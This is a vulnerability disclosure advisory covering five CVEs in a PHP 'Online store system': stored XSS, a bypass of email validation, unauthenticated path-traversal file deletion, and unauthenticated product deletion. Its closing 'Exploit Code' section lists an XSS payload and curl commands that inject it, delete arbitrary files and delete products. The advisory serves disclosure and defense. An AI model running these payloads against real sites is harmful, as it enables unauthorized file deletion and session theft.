Advisory #: 210
Title: Multiple vulnerabilities in Online store system v1.0 Stored XSS and unauthenticated product deletions.
Author: Larry W. Cashdollar
Date: 2019-09-18
CVE-ID:[CVE-2019-8288][CVE-2019-8289][CVE-2019-8290][CVE-2019-8291][CVE-2019-8292]
CWE:
Download Site: https://www.abcprintf.com/view_download.php?id=17
Vendor: adcprintf
Vendor Notified: 2019-09-18
Vendor Contact: abcprintf@gmail.com
Advisory: http://www.vapidlabs.com/advisory.php?v=210
Description: "Online store system" is a drop in customizable electronic storefront. It has an administrative interface allowing user and product management.
Vulnerability:
The application contains stored XSS vulnerabilities throughout the form user_view.php pages as none of the variables are sanitized before being presented back to the client. This can be exploited by a new user injecting cookie stealing code into their login information form and waiting for an administrative user to navigate to the users panel. CVE-2019-8288 159 echo '<td>'.$row['adidas_member_user'].'</td>'; CVE-2019-8289 160 echo '<td>'. $row['adidas_member_email'] . '</td>'; CVE-2019-8290 The registration form requirements for the member email format can be bypassed by posting directly to sent_register.php allowing special characters to be included and an XSS payload to be injected. CVE-2019-8291 The code in delete_file.php doesn't check to see if a user has administrative rights nor does it check for path traversal allowing a '..' to delete arbitrary files owned by the httpd process. CVE-2019-8292 The code in delete_product.php doesn't check to see if a user has administrative rights before allowing them to delete a product from the database.
Export: JSON TEXT XML
Exploit Code:
  1. Set login name or email to "><script>alert(1);</script>
  2. $ curl -s cookie.txt -X POST -d "username=jsmith&password=jsmith123&email=\"><script>alert(1);</script>%40email.com" http://example.com/pso/sent_register.php
  3.  
  4.  
  5. $ curl -s cookie.txt "http://example.com/pso/admin/delete_file.php?id=0&filename=../women.php"
  6.  
  7. $ curl -s cookie.txt http://example.com/pso/admin/product_delete.php?id=4
Screen Shots:
Notes: